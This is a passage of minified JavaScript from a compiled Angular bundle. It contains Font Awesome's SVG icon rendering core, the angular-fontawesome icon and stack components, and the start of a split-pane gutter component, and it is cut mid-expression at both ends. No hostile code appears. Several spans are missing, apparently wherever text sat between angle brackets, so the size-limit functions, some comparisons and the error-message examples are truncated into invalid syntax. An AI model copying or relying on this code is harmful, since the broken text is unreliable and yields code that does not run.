"),0===r.toNode.length?e.removeAttribute("class"):e.setAttribute("class",r.toNode.join(" "))}var c=i.map(function(d){return Ab(d)}).join("\n");e.setAttribute(vg,""),e.innerHTML=c}};function HB(t){t()}function UB(t,a){var e="function"==typeof a?a:RA;if(0===t.length)e();else{var i=HB;"async"===Ca.mutateApproach&&(i=Mp.requestAnimationFrame||HB),i(function(){var n=function Wbe(){return!0===Ca.autoReplaceSvg?SA.replace:SA[Ca.autoReplaceSvg]||SA.replace}(),r=J8_begin("mutate");t.map(n),r(),e()})}}var Z8=!1;function qB(){Z8=!0}function eI(){Z8=!1}var kA=null;function GB(t){if(uB&&Ca.observeMutations){var a=t.treeCallback,e=void 0===a?RA:a,i=t.nodeCallback,n=void 0===i?RA:i,r=t.pseudoElementsCallback,c=void 0===r?RA:r,d=t.observeMutationsRoot,T=void 0===d?Mr:d;kA=new uB(function(k){if(!Z8){var q=Ap();j1(k).forEach(function(Y){if("childList"===Y.type&&Y.addedNodes.length>0&&!VB(Y.addedNodes[0])&&(Ca.searchPseudoElements&&c(Y.target),e(Y.target)),"attributes"===Y.type&&Y.target.parentNode&&Ca.searchPseudoElements&&c(Y.target.parentNode),"attributes"===Y.type&&VB(Y.target)&&~Jye.indexOf(Y.attributeName))if("class"===Y.attributeName&&function Lbe(t){var a=t.getAttribute?t.getAttribute(P8):null,e=t.getAttribute?t.getAttribute(O8):null;return a&&e}(Y.target)){var te=wA(L8(Y.target)),Re=te.iconName;Y.target.setAttribute(P8,te.prefix||q),Re&&Y.target.setAttribute(O8,Re)}else(function zbe(t){return t&&t.classList&&t.classList.contains&&t.classList.contains(Ca.replacementClass)})(Y.target)&&n(Y.target)})}}),Kh&&kA.observe(T,{childList:!0,attributes:!0,characterData:!0,subtree:!0})}}function Ube(t){var a=t.getAttribute("style"),e=[];return a&&(e=a.split(";").reduce(function(i,n){var r=n.split(":"),c=r[0],d=r.slice(1);return c&&d.length>0&&(i[c]=d.join(":").trim()),i},{})),e}function qbe(t){var a=t.getAttribute("data-prefix"),e=t.getAttribute("data-icon"),i=void 0!==t.innerText?t.innerText.trim():"",n=wA(L8(t));return n.prefix||(n.prefix=Ap()),a&&e&&(n.prefix=a,n.iconName=e),n.iconName&&n.prefix||(n.prefix&&i.length>0&&(n.iconName=function Mbe(t,a){return(wB[t]||{})[a]}(n.prefix,t.innerText)||U8(n.prefix,V8(t.innerText))),!n.iconName&&Ca.autoFetchSvg&&t.firstChild&&t.firstChild.nodeType===Node.TEXT_NODE&&(n.iconName=t.firstChild.data)),n}function Gbe(t){var a=j1(t.attributes).reduce(function(n,r){return"class"!==n.name&&"style"!==n.name&&(n[r.name]=r.value),n},{}),e=t.getAttribute("title"),i=t.getAttribute("data-fa-title-id");return Ca.autoA11y&&(e?a["aria-labelledby"]="".concat(Ca.replacementClass,"-title-").concat(i||vb()):(a["aria-hidden"]="true",a.focusable="false")),a}function jB(t){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{styleParser:!0},e=qbe(t),i=e.iconName,n=e.prefix,r=e.rest,c=Gbe(t),d=G8("parseNodeAttributes",{},t),T=a.styleParser?Ube(t):[];return ia({iconName:i,title:t.getAttribute("title"),titleId:t.getAttribute("data-fa-title-id"),prefix:n,transform:xu,mask:{iconName:null,prefix:null,rest:[]},maskId:null,symbol:!1,extra:{classes:r,styles:T,attributes:c}},d)}var Qbe=Im.styles;function QB(t){var a="nest"===Ca.autoReplaceSvg?jB(t,{styleParser:!1}):jB(t);return~a.extra.classes.indexOf(CB)?Jh("generateLayersText",t,a):Jh("generateSvgReplacementMutation",t,a)}var Tp=new Set;function $B(t){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:null;if(!Kh)return Promise.resolve();var e=Mr.documentElement.classList,i=function(Y){return e.add("".concat(_B,"-").concat(Y))},n=function(Y){return e.remove("".concat(_B,"-").concat(Y))},r=Ca.autoFetchSvg?Tp:N8.map(function(q){return"fa-".concat(q)}).concat(Object.keys(Qbe));r.includes("fa")||r.push("fa");var c=[".".concat(CB,":not([").concat(vg,"])")].concat(r.map(function(q){return".".concat(q,":not([").concat(vg,"])")})).join(", ");if(0===c.length)return Promise.resolve();var d=[];try{d=j1(t.querySelectorAll(c))}catch(q){}if(!(d.length>0))return Promise.resolve();i("pending"),n("complete");var T=J8_begin("onTree"),k=d.reduce(function(q,Y){try{var te=QB(Y);te&&q.push(te)}catch(pe){gB||"MissingIcon"===pe.name&&console.error(pe)}return q},[]);return new Promise(function(q,Y){Promise.all(k).then(function(te){UB(te,function(){i("active"),i("complete"),n("pending"),"function"==typeof a&&a(),T(),q()})}).catch(function(te){T(),Y(te)})})}function $be(t){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:null;QB(t).then(function(e){e&&UB([e],a)})}N8.map(function(t){Tp.add("fa-".concat(t))}),Object.keys(_b[vr]).map(Tp.add.bind(Tp)),Object.keys(_b[Qr]).map(Tp.add.bind(Tp)),Tp=fb(Tp);var Xbe=function(a){var e=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},i=e.transform,n=void 0===i?xu:i,r=e.symbol,c=void 0!==r&&r,d=e.mask,T=void 0===d?null:d,k=e.maskId,q=void 0===k?null:k,Y=e.title,te=void 0===Y?null:Y,pe=e.titleId,Re=void 0===pe?null:pe,Fe=e.classes,Ne=void 0===Fe?[]:Fe,et=e.attributes,ut=void 0===et?{}:et,Ze=e.styles,yt=void 0===Ze?{}:Ze;if(a){var It=a.prefix,St=a.iconName,Nt=a.icon;return IA(ia({type:"icon"},a),function(){return Eg("beforeDOMElementCreation",{iconDefinition:a,params:e}),Ca.autoA11y&&(te?ut["aria-labelledby"]="".concat(Ca.replacementClass,"-title-").concat(Re||vb()):(ut["aria-hidden"]="true",ut.focusable="false")),Q8({icons:{main:K8(Nt),mask:T?K8(T.icon):{found:!1,width:null,height:null,icon:{}}},prefix:It,iconName:St,transform:ia(ia({},xu),n),symbol:c,title:te,maskId:q,titleId:Re,extra:{attributes:ut,styles:yt,classes:Ne}})})}},Ybe={mixout:function(){return{icon:(t=Xbe,function(a){var e=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},i=(a||{}).icon?a:j8(a||{}),n=e.mask;return n&&(n=(n||{}).icon?n:j8(n||{})),t(i,ia(ia({},e),{},{mask:n}))})};var t},hooks:function(){return{mutationObserverCallbacks:function(e){return e.treeCallback=$B,e.nodeCallback=$be,e}}},provides:function(a){a.i2svg=function(e){var i=e.node,r=e.callback;return $B(void 0===i?Mr:i,void 0===r?function(){}:r)},a.generateSvgReplacementMutation=function(e,i){var n=i.iconName,r=i.title,c=i.titleId,d=i.prefix,T=i.transform,k=i.symbol,q=i.mask,Y=i.maskId,te=i.extra;return new Promise(function(pe,Re){Promise.all([X8(n,d),q.iconName?X8(q.iconName,q.prefix):Promise.resolve({found:!1,width:512,height:512,icon:{}})]).then(function(Fe){var Ne=w8(Fe,2);pe([e,Q8({icons:{main:Ne[0],mask:Ne[1]},prefix:d,iconName:n,transform:T,symbol:k,maskId:Y,title:r,titleId:c,extra:te,watchable:!0})])}).catch(Re)})},a.generateAbstractIcon=function(e){var k,i=e.children,n=e.attributes,r=e.main,c=e.transform,T=vA(e.styles);return T.length>0&&(n.style=T),z8(c)&&(k=Jh("generateAbstractTransformGrouping",{main:r,transform:c,containerWidth:r.width,iconWidth:r.width})),i.push(k||r.icon),{children:i,attributes:n}}}},Jbe={mixout:function(){return{layer:function(e){var i=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},n=i.classes,r=void 0===n?[]:n;return IA({type:"layer"},function(){Eg("beforeDOMElementCreation",{assembler:e,params:i});var c=[];return e(function(d){Array.isArray(d)?d.map(function(T){c=c.concat(T.abstract)}):c=c.concat(d.abstract)}),[{tag:"span",attributes:{class:["".concat(Ca.cssPrefix,"-layers")].concat(fb(r)).join(" ")},children:c}]})}}}},Zbe={mixout:function(){return{counter:function(e){var i=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},n=i.title,r=void 0===n?null:n,c=i.classes,d=void 0===c?[]:c,T=i.attributes,k=void 0===T?{}:T,q=i.styles,Y=void 0===q?{}:q;return IA({type:"counter",content:e},function(){return Eg("beforeDOMElementCreation",{content:e,params:i}),kbe({content:e.toString(),title:r,extra:{attributes:k,styles:Y,classes:["".concat(Ca.cssPrefix,"-layers-counter")].concat(fb(d))}})})}}}},eMe={mixout:function(){return{text:function(e){var i=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},n=i.transform,r=void 0===n?xu:n,c=i.title,d=void 0===c?null:c,T=i.classes,k=void 0===T?[]:T,q=i.attributes,Y=void 0===q?{}:q,te=i.styles,pe=void 0===te?{}:te;return IA({type:"text",content:e},function(){return Eg("beforeDOMElementCreation",{content:e,params:i}),zB({content:e,transform:ia(ia({},xu),r),title:d,extra:{attributes:Y,styles:pe,classes:["".concat(Ca.cssPrefix,"-layers-text")].concat(fb(k))}})})}}},provides:function(a){a.generateLayersText=function(e,i){var n=i.title,r=i.transform,c=i.extra,d=null,T=null;if(hB){var k=parseInt(getComputedStyle(e).fontSize,10),q=e.getBoundingClientRect();d=q.width/k,T=q.height/k}return Ca.autoA11y&&!n&&(c.attributes["aria-hidden"]="true"),Promise.resolve([e,zB({content:e.innerHTML,width:d,height:T,transform:r,title:n,extra:c,watchable:!0})])}}},tMe=new RegExp('"',"ug"),KB=[1105920,1112319];function XB(t,a){var e="".concat("data-fa-pseudo-element-pending").concat(a.replace(":","-"));return new Promise(function(i,n){if(null!==t.getAttribute(e))return i();var c=j1(t.children).filter(function(Nt){return Nt.getAttribute(k8)===a})[0],d=Mp.getComputedStyle(t,a),T=d.getPropertyValue("font-family").match(Kye),k=d.getPropertyValue("font-weight"),q=d.getPropertyValue("content");if(c&&!T)return t.removeChild(c),i();if(T&&"none"!==q&&""!==q){var Y=d.getPropertyValue("content"),te=~["Sharp"].indexOf(T[2])?Qr:vr,pe=~["Solid","Regular","Light","Thin","Duotone","Brands","Kit"].indexOf(T[2])?gb[te][T[2].toLowerCase()]:Xye[te][k],Re=function iMe(t){var a=t.replace(tMe,""),e=function pbe(t,a){var n,e=t.length,i=t.charCodeAt(a);return i>=55296&&i<=56319&&e>a+1&&(n=t.charCodeAt(a+1))>=56320&&n<=57343?1024*(i-55296)+n-56320+65536:i}(a,0),i=e>=KB[0]&&e<=KB[1],n=2===a.length&&a[0]===a[1];return{value:V8(n?a[0]:a),isSecondary:i||n}}(Y),Fe=Re.value,Ne=Re.isSecondary,et=T[0].startsWith("FontAwesome"),ut=U8(pe,Fe),Ze=ut;if(et){var yt=function vbe(t){var a=RB[t],e=U8("fas",t);return a||(e?{prefix:"fas",iconName:e}:null)||{prefix:null,iconName:null}}(Fe);yt.iconName&&yt.prefix&&(ut=yt.iconName,pe=yt.prefix)}if(!ut||Ne||c&&c.getAttribute(P8)===pe&&c.getAttribute(O8)===Ze)i();else{t.setAttribute(e,Ze),c&&t.removeChild(c);var It=function jbe(){return{iconName:null,title:null,titleId:null,prefix:null,transform:xu,symbol:!1,mask:{iconName:null,prefix:null,rest:[]},maskId:null,extra:{classes:[],styles:{},attributes:{}}}}(),St=It.extra;St.attributes[k8]=a,X8(ut,pe).then(function(Nt){var oi=Q8(ia(ia({},It),{},{icons:{main:Nt,mask:{prefix:null,iconName:null,rest:[]}},prefix:pe,iconName:Ze,extra:St,watchable:!0})),Ai=Mr.createElement("svg");"::before"===a?t.insertBefore(Ai,t.firstChild):t.appendChild(Ai),Ai.outerHTML=oi.map(function(vi){return Ab(vi)}).join("\n"),t.removeAttribute(e),i()}).catch(n)}}else i()})}function aMe(t){return Promise.all([XB(t,"::before"),XB(t,"::after")])}function nMe(t){return!(t.parentNode===document.head||~jye.indexOf(t.tagName.toUpperCase())||t.getAttribute(k8)||t.parentNode&&"svg"===t.parentNode.tagName)}function YB(t){if(Kh)return new Promise(function(a,e){var i=j1(t.querySelectorAll("*")).filter(nMe).map(aMe),n=J8_begin("searchPseudoElements");qB(),Promise.all(i).then(function(){n(),eI(),a()}).catch(function(){n(),eI(),e()})})}var JB=!1,ZB=function(a){return a.toLowerCase().split(" ").reduce(function(i,n){var r=n.toLowerCase().split("-"),c=r[0],d=r.slice(1).join("-");if(c&&"h"===d)return i.flipX=!0,i;if(c&&"v"===d)return i.flipY=!0,i;if(d=parseFloat(d),isNaN(d))return i;switch(c){case"grow":i.size=i.size+d;break;case"shrink":i.size=i.size-d;break;case"left":i.x=i.x-d;break;case"right":i.x=i.x+d;break;case"up":i.y=i.y-d;break;case"down":i.y=i.y+d;break;case"rotate":i.rotate=i.rotate+d}return i},{size:16,x:0,y:0,flipX:!1,flipY:!1,rotate:0})},tI={x:0,y:0,width:"100%",height:"100%"};function eH(t){var a=!(arguments.length>1&&void 0!==arguments[1])||arguments[1];return t.attributes&&(t.attributes.fill||a)&&(t.attributes.fill="black"),t}!function Ebe(t,a){var e=a.mixoutsTo;NB=t,$1={},Object.keys(K1).forEach(function(i){-1===Tbe.indexOf(i)&&delete K1[i]}),NB.forEach(function(i){var n=i.mixout?i.mixout():{};if(Object.keys(n).forEach(function(c){"function"==typeof n[c]&&(e[c]=n[c]),"object"===fA(n[c])&&Object.keys(n[c]).forEach(function(d){e[c]||(e[c]={}),e[c][d]=n[c][d]})}),i.hooks){var r=i.hooks();Object.keys(r).forEach(function(c){$1[c]||($1[c]=[]),$1[c].push(r[c])})}i.provides&&i.provides(K1)})}([dbe,Ybe,Jbe,Zbe,eMe,{hooks:function(){return{mutationObserverCallbacks:function(e){return e.pseudoElementsCallback=YB,e}}},provides:function(a){a.pseudoElements2svg=function(e){var i=e.node;Ca.searchPseudoElements&&YB(void 0===i?Mr:i)}}},{mixout:function(){return{dom:{unwatch:function(){qB(),JB=!0}}}},hooks:function(){return{bootstrap:function(){GB(G8("mutationObserverCallbacks",{}))},noAuto:function(){!function Hbe(){!kA||kA.disconnect()}()},watch:function(e){var i=e.observeMutationsRoot;JB?eI():GB(G8("mutationObserverCallbacks",{observeMutationsRoot:i}))}}}},{mixout:function(){return{parse:{transform:function(e){return ZB(e)}}}},hooks:function(){return{parseNodeAttributes:function(e,i){var n=i.getAttribute("data-fa-transform");return n&&(e.transform=ZB(n)),e}}},provides:function(a){a.generateAbstractTransformGrouping=function(e){var i=e.main,n=e.transform,c=e.iconWidth,d={transform:"translate(".concat(e.containerWidth/2," 256)")},T="translate(".concat(32*n.x,", ").concat(32*n.y,") "),k="scale(".concat(n.size/16*(n.flipX?-1:1),", ").concat(n.size/16*(n.flipY?-1:1),") "),q="rotate(".concat(n.rotate," 0 0)"),pe={outer:d,inner:{transform:"".concat(T," ").concat(k," ").concat(q)},path:{transform:"translate(".concat(c/2*-1," -256)")}};return{tag:"g",attributes:ia({},pe.outer),children:[{tag:"g",attributes:ia({},pe.inner),children:[{tag:i.icon.tag,children:i.icon.children,attributes:ia(ia({},i.icon.attributes),pe.path)}]}]}}}},{hooks:function(){return{parseNodeAttributes:function(e,i){var n=i.getAttribute("data-fa-mask"),r=n?wA(n.split(" ").map(function(c){return c.trim()})):{prefix:null,iconName:null,rest:[]};return r.prefix||(r.prefix=Ap()),e.mask=r,e.maskId=i.getAttribute("data-fa-mask-id"),e}}},provides:function(a){a.generateAbstractMask=function(e){var t,i=e.children,n=e.attributes,r=e.main,c=e.mask,d=e.maskId,q=r.icon,te=c.icon,pe=function sbe(t){var a=t.transform,i=t.iconWidth,n={transform:"translate(".concat(t.containerWidth/2," 256)")},r="translate(".concat(32*a.x,", ").concat(32*a.y,") "),c="scale(".concat(a.size/16*(a.flipX?-1:1),", ").concat(a.size/16*(a.flipY?-1:1),") "),d="rotate(".concat(a.rotate," 0 0)");return{outer:n,inner:{transform:"".concat(r," ").concat(c," ").concat(d)},path:{transform:"translate(".concat(i/2*-1," -256)")}}}({transform:e.transform,containerWidth:c.width,iconWidth:r.width}),Re={tag:"rect",attributes:ia(ia({},tI),{},{fill:"white"})},Fe=q.children?{children:q.children.map(eH)}:{},Ne={tag:"g",attributes:ia({},pe.inner),children:[eH(ia({tag:q.tag,attributes:ia(ia({},q.attributes),pe.path)},Fe))]},et={tag:"g",attributes:ia({},pe.outer),children:[Ne]},ut="mask-".concat(d||vb()),Ze="clip-".concat(d||vb()),yt={tag:"mask",attributes:ia(ia({},tI),{},{id:ut,maskUnits:"userSpaceOnUse",maskContentUnits:"userSpaceOnUse"}),children:[Re,et]},It={tag:"defs",children:[{tag:"clipPath",attributes:{id:Ze},children:(t=te,"g"===t.tag?t.children:[t])},yt]};return i.push(It,{tag:"rect",attributes:ia({fill:"currentColor","clip-path":"url(#".concat(Ze,")"),mask:"url(#".concat(ut,")")},tI)}),{children:i,attributes:n}}}},{provides:function(a){var e=!1;Mp.matchMedia&&(e=Mp.matchMedia("(prefers-reduced-motion: reduce)").matches),a.missingIconAbstract=function(){var i=[],n={fill:"currentColor"},r={attributeType:"XML",repeatCount:"indefinite",dur:"2s"};i.push({tag:"path",attributes:ia(ia({},n),{},{d:"M156.5,447.7l-12.6,29.5c-18.7-9.5-35.9-21.2-51.5-34.9l22.7-22.7C127.6,430.5,141.5,440,156.5,447.7z M40.6,272H8.5 c1.4,21.2,5.4,41.7,11.7,61.1L50,321.2C45.1,305.5,41.8,289,40.6,272z M40.6,240c1.4-18.8,5.2-37,11.1-54.1l-29.5-12.6 C14.7,194.3,10,216.7,8.5,240H40.6z M64.3,156.5c7.8-14.9,17.2-28.8,28.1-41.5L69.7,92.3c-13.7,15.6-25.5,32.8-34.9,51.5 L64.3,156.5z M397,419.6c-13.9,12-29.4,22.3-46.1,30.4l11.9,29.8c20.7-9.9,39.8-22.6,56.9-37.6L397,419.6z M115,92.4 c13.9-12,29.4-22.3,46.1-30.4l-11.9-29.8c-20.7,9.9-39.8,22.6-56.8,37.6L115,92.4z M447.7,355.5c-7.8,14.9-17.2,28.8-28.1,41.5 l22.7,22.7c13.7-15.6,25.5-32.9,34.9-51.5L447.7,355.5z M471.4,272c-1.4,18.8-5.2,37-11.1,54.1l29.5,12.6 c7.5-21.1,12.2-43.5,13.6-66.8H471.4z M321.2,462c-15.7,5-32.2,8.2-49.2,9.4v32.1c21.2-1.4,41.7-5.4,61.1-11.7L321.2,462z M240,471.4c-18.8-1.4-37-5.2-54.1-11.1l-12.6,29.5c21.1,7.5,43.5,12.2,66.8,13.6V471.4z M462,190.8c5,15.7,8.2,32.2,9.4,49.2h32.1 c-1.4-21.2-5.4-41.7-11.7-61.1L462,190.8z M92.4,397c-12-13.9-22.3-29.4-30.4-46.1l-29.8,11.9c9.9,20.7,22.6,39.8,37.6,56.9 L92.4,397z M272,40.6c18.8,1.4,36.9,5.2,54.1,11.1l12.6-29.5C317.7,14.7,295.3,10,272,8.5V40.6z M190.8,50 c15.7-5,32.2-8.2,49.2-9.4V8.5c-21.2,1.4-41.7,5.4-61.1,11.7L190.8,50z M442.3,92.3L419.6,115c12,13.9,22.3,29.4,30.5,46.1 l29.8-11.9C470,128.5,457.3,109.4,442.3,92.3z M397,92.4l22.7-22.7c-15.6-13.7-32.8-25.5-51.5-34.9l-12.6,29.5 C370.4,72.1,384.4,81.5,397,92.4z"})});var c=ia(ia({},r),{},{attributeName:"opacity"}),d={tag:"circle",attributes:ia(ia({},n),{},{cx:"256",cy:"364",r:"28"}),children:[]};return e||d.children.push({tag:"animate",attributes:ia(ia({},r),{},{attributeName:"r",values:"28;14;28;28;14;28;"})},{tag:"animate",attributes:ia(ia({},c),{},{values:"1;0;1;1;0;1;"})}),i.push(d),i.push({tag:"path",attributes:ia(ia({},n),{},{opacity:"1",d:"M263.7,312h-16c-6.6,0-12-5.4-12-12c0-71,77.4-63.9,77.4-107.8c0-20-17.8-40.2-57.4-40.2c-29.1,0-44.3,9.6-59.2,28.7 c-3.9,5-11.1,6-16.2,2.4l-13.1-9.2c-5.6-3.9-6.9-11.8-2.6-17.2c21.2-27.2,46.4-44.7,91.2-44.7c52.3,0,97.4,29.8,97.4,80.2 c0,67.6-77.4,63.5-77.4,107.8C275.7,306.6,270.3,312,263.7,312z"}),children:e?[]:[{tag:"animate",attributes:ia(ia({},c),{},{values:"1;0;0;0;0;1;"})}]}),e||i.push({tag:"path",attributes:ia(ia({},n),{},{opacity:"0",d:"M232.5,134.5l7,168c0.3,6.4,5.6,11.5,12,11.5h9c6.4,0,11.7-5.1,12-11.5l7-168c0.3-6.8-5.2-12.5-12-12.5h-23 C237.7,122,232.2,127.7,232.5,134.5z"}),children:[{tag:"animate",attributes:ia(ia({},c),{},{values:"0;0;1;1;0;0;"})}]}),{tag:"g",attributes:{class:"missing"},children:i}}}},{hooks:function(){return{parseNodeAttributes:function(e,i){var n=i.getAttribute("data-fa-symbol");return e.symbol=null!==n&&(""===n||n),e}}}}],{mixoutsTo:Ql});var hMe=Ql.parse,fMe=Ql.icon;const pMe=["*"],CMe=t=>{const a={"fa-spin":t.spin,"fa-pulse":t.pulse,"fa-fw":t.fixedWidth,"fa-border":t.border,"fa-inverse":t.inverse,"fa-layers-counter":t.counter,"fa-flip-horizontal":"horizontal"===t.flip||"both"===t.flip,"fa-flip-vertical":"vertical"===t.flip||"both"===t.flip,[`fa-${t.size}`]:null!==t.size,[`fa-rotate-${t.rotate}`]:null!==t.rotate,[`fa-pull-${t.pull}`]:null!==t.pull,[`fa-stack-${t.stackItemSize}`]:null!=t.stackItemSize};return Object.keys(a).map(e=>a[e]?e:null).filter(e=>e)};let MMe=(()=>{class t{constructor(){this.defaultPrefix="fas",this.fallbackIcon=null}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),vMe=(()=>{class t{constructor(){this.definitions={}}addIcons(...e){for(const i of e){i.prefix in this.definitions||(this.definitions[i.prefix]={}),this.definitions[i.prefix][i.iconName]=i;for(const n of i.icon[2])"string"==typeof n&&(this.definitions[i.prefix][n]=i)}}addIconPacks(...e){for(const i of e){const n=Object.keys(i).map(r=>i[r]);this.addIcons(...n)}}getIconDefinition(e,i){return e in this.definitions&&i in this.definitions[e]?this.definitions[e][i]:null}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),AMe=(()=>{class t{constructor(){this.stackItemSize="1x"}ngOnChanges(e){if("size"in e)throw new Error('fa-icon is not allowed to customize size when used inside fa-stack. Set size on the enclosing fa-stack instead: ....')}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["fa-icon","stackItemSize",""],["fa-duotone-icon","stackItemSize",""]],inputs:{stackItemSize:"stackItemSize",size:"size"},features:[sa]}),t})(),TMe=(()=>{class t{constructor(e,i){this.renderer=e,this.elementRef=i}ngOnInit(){this.renderer.addClass(this.elementRef.nativeElement,"fa-stack")}ngOnChanges(e){"size"in e&&(null!=e.size.currentValue&&this.renderer.addClass(this.elementRef.nativeElement,`fa-${e.size.currentValue}`),null!=e.size.previousValue&&this.renderer.removeClass(this.elementRef.nativeElement,`fa-${e.size.previousValue}`))}}return t.\u0275fac=function(e){return new(e||t)(Ee(wr),Ee(mi))},t.\u0275cmp=Wt({type:t,selectors:[["fa-stack"]],inputs:{size:"size"},features:[sa],ngContentSelectors:pMe,decls:1,vars:0,template:function(e,i){1&e&&(Jn(),va(0))},encapsulation:2}),t})(),tH=(()=>{class t{constructor(e,i,n,r,c){this.sanitizer=e,this.config=i,this.iconLibrary=n,this.stackItem=r,this.classes=[],null!=c&&null==r&&console.error('FontAwesome: fa-icon and fa-duotone-icon elements must specify stackItemSize attribute when wrapped into fa-stack. Example: .')}ngOnChanges(e){if(null==this.icon&&null==this.config.fallbackIcon)return(()=>{throw new Error("Property `icon` is required for `fa-icon`/`fa-duotone-icon` components.")})();let i=null;if(i=null==this.icon?this.config.fallbackIcon:this.icon,e){const n=this.findIconDefinition(i);if(null!=n){const r=this.buildParams();this.renderIcon(n,r)}}}render(){this.ngOnChanges({})}findIconDefinition(e){const i=((t,a)=>(t=>void 0!==t.prefix&&void 0!==t.iconName)(t)?t:Array.isArray(t)&&2===t.length?{prefix:t[0],iconName:t[1]}:"string"==typeof t?{prefix:a,iconName:t}:void 0)(e,this.config.defaultPrefix);if("icon"in i)return i;const n=this.iconLibrary.getIconDefinition(i.prefix,i.iconName);return null!=n?n:((t=>{throw new Error(`Could not find icon with iconName=${t.iconName} and prefix=${t.prefix} in the icon library.`)})(i),null)}buildParams(){const e={flip:this.flip,spin:this.spin,pulse:this.pulse,border:this.border,inverse:this.inverse,size:this.size||null,pull:this.pull||null,rotate:this.rotate||null,fixedWidth:"boolean"==typeof this.fixedWidth?this.fixedWidth:this.config.fixedWidth,stackItemSize:null!=this.stackItem?this.stackItem.stackItemSize:null},i="string"==typeof this.transform?hMe.transform(this.transform):this.transform;return{title:this.title,transform:i,classes:[...CMe(e),...this.classes],mask:null!=this.mask?this.findIconDefinition(this.mask):null,styles:null!=this.styles?this.styles:{},symbol:this.symbol,attributes:{role:this.a11yRole}}}renderIcon(e,i){const n=fMe(e,i);this.renderedIconHTML=this.sanitizer.bypassSecurityTrustHtml(n.html.join("\n"))}}return t.\u0275fac=function(e){return new(e||t)(Ee(cy),Ee(MMe),Ee(vMe),Ee(AMe,8),Ee(TMe,8))},t.\u0275cmp=Wt({type:t,selectors:[["fa-icon"]],hostAttrs:[1,"ng-fa-icon"],hostVars:2,hostBindings:function(e,i){2&e&&(Gs("innerHTML",i.renderedIconHTML,Uc),Rt("title",i.title))},inputs:{icon:"icon",title:"title",spin:"spin",pulse:"pulse",mask:"mask",styles:"styles",flip:"flip",size:"size",pull:"pull",border:"border",inverse:"inverse",symbol:"symbol",rotate:"rotate",fixedWidth:"fixedWidth",classes:"classes",transform:"transform",a11yRole:"a11yRole"},features:[sa],decls:0,vars:0,template:function(e,i){},encapsulation:2}),t})(),iH=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})();const EMe=["gutterEls"];function DMe(t,a){if(1&t){const e=Ye();m(0,"div",2,3),he("keydown",function(n){be(e);const r=V().index;return Me(V().startKeyboardDrag(n,2*r+1,r+1))})("mousedown",function(n){be(e);const r=V().index;return Me(V().startMouseDrag(n,2*r+1,r+1))})("touchstart",function(n){be(e);const r=V().index;return Me(V().startMouseDrag(n,2*r+1,r+1))})("mouseup",function(n){be(e);const r=V().index;return Me(V().clickGutter(n,r+1))})("touchend",function(n){be(e);const r=V().index;return Me(V().clickGutter(n,r+1))}),it(2,"div",4),u()}if(2&t){const e=V(),i=e.index,n=e.$implicit,r=V();ri("flex-basis",r.gutterSize,"px")("order",2*i+1),Rt("aria-label",r.gutterAriaLabel)("aria-orientation",r.direction)("aria-valuemin",n.minSize)("aria-valuemax",n.maxSize)("aria-valuenow",n.size)("aria-valuetext",r.getAriaAreaSizeText(n.size))}}function xMe(t,a){1&t&&ne(0,DMe,3,10,"div",1),2&t&&F("ngIf",!1===a.last)}const wMe=["*"];function Eb(t){if(void 0!==t.changedTouches&&t.changedTouches.length>0)return{x:t.changedTouches[0].clientX,y:t.changedTouches[0].clientY};if(void 0!==t.clientX&&void 0!==t.clientY)return{x:t.clientX,y:t.clientY};if(void 0!==t.currentTarget){const a=t.currentTarget;return{x:a.offsetLeft,y:a.offsetTop}}return null}function aH(t,a,e){return Math.abs(t.x-a.x)<=e&&Math.abs(t.y-a.y)<=e}function nH(t,a){const e=t.nativeElement.getBoundingClientRect();return"horizontal"===a?e.width:e.height}function Db(t){return"boolean"==typeof t?t:"false"!==t}function Ep(t,a){return null==t?a:(t=Number(t),!isNaN(t)&&t>=0?t:a)}function oH(t,a){if("percent"===t){const e=a.reduce((i,n)=>null!==n?i+n:i,0);return a.every(i=>null!==i)&&e>99.9&&e<100.1}if("pixel"===t)return 1===a.filter(e=>null===e).length}function PA(t){return null===t.size?null:!0===t.component.lockSize?t.size:null===t.component.minSize?null:t.component.minSize>t.size?t.size:t.component.minSize}function OA(t){return null===t.size?null:!0===t.component.lockSize?t.size:null===t.component.maxSize?null:t.component.maxSize{const c=function RMe(t,a,e,i){return 0===e?{areaSnapshot:a,pixelAbsorb:0,percentAfterAbsorption:a.sizePercentAtStart,pixelRemain:0}:0===a.sizePixelAtStart&&e<0?{areaSnapshot:a,pixelAbsorb:0,percentAfterAbsorption:0,pixelRemain:e}:"percent"===t?function SMe(t,a,e){const n=(t.sizePixelAtStart+a)/e*100;if(a>0){if(null!==t.area.maxSize&&n>t.area.maxSize){const r=t.area.maxSize/100*e;return{areaSnapshot:t,pixelAbsorb:r,percentAfterAbsorption:t.area.maxSize,pixelRemain:t.sizePixelAtStart+a-r}}return{areaSnapshot:t,pixelAbsorb:a,percentAfterAbsorption:n>100?100:n,pixelRemain:0}}if(a<0){if(null!==t.area.minSize&&n0?null!==t.area.maxSize&&i>t.area.maxSize?{areaSnapshot:t,pixelAbsorb:t.area.maxSize-t.sizePixelAtStart,percentAfterAbsorption:-1,pixelRemain:i-t.area.maxSize}:{areaSnapshot:t,pixelAbsorb:a,percentAfterAbsorption:-1,pixelRemain:0}:a<0?null!==t.area.minSize&&i{class t{constructor(e,i,n,r,c){this.ngZone=e,this.elRef=i,this.cdRef=n,this.renderer=r,this.gutterClickDeltaPx=2,this._config={direction:"horizontal",unit:"percent",gutterSize:11,gutterStep:1,restrictMove:!1,useTransition:!1,disabled:!1,dir:"ltr",gutterDblClickDuration:0},this.dragStart=new Tt(!1),this.dragEnd=new Tt(!1),this.gutterClick=new Tt(!1),this.gutterDblClick=new Tt(!1),this.dragProgressSubject=new 